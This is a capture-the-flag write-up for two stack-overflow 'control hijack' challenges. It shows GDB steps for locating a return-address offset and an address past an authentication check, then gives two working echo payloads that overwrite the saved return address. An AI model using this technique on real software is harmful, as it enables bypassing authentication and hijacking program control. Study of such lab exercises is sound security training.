Tricky Control Hijack

Tricky Control Hijack (easy)

  1. In GDB, disas win_authed shows that the instruction immediately after the auth check is at 0x40203e.
  2. As the debug output states, the return address of challenge() is stored 56 bytes from the start of the input buffer.

```shell
echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x3e\x20\x40\x00\x00\x00\x00\x00" | /challenge/binary-exploitation-control-hijack-2-w
```

Tricky Control Hijack (hard)

  1. In gdb, disas win_authed and disas main show:

    • Instruction after auth check is at 0x00000000004021de
    • challenge() returns at 0x0000000000402441
  2. Set a breakpoint with b *challenge+148, run, and give a short string of a's as input.

  3. info frame -> rbp is at 0x7ffd1df81e00
  4. x/100xg $rbp-200:
    • input buffer starts at 0x7ffd1df81db0, which is rbp-0x50 = rbp-80
    • return address is stored at 0x7ffd1df81e08, which is rbp+0x8 = rbp+8
  5. The buffer starts at rbp-0x50 and the return address sits at rbp+8, so 0x50 + 8 = 88 bytes of a's followed by the desired address:

```shell
echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xde\x21\x40\x00\x00\x00\x00\x00" | /challenge/binary-exploitation-control-hijack-2
```